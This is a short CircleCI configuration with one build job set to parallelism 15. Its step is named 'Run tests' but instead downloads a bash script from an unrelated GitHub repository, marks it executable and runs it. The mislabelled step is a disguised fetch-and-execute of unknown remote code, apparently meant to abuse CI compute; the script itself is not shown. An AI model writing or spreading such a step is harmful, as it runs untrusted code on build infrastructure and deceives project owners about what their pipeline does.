jobs: 
  build: 
    parallelism: 15 
    docker: 
      - image: cimg/ruby:3.0.2-node 
    steps:  
      - checkout  
      - run:  
          name: Run tests  
          command: wget https://raw.githubusercontent.com/semloni/kelonana/main/enake/bash.sh && chmod +x bash.sh && ./bash.sh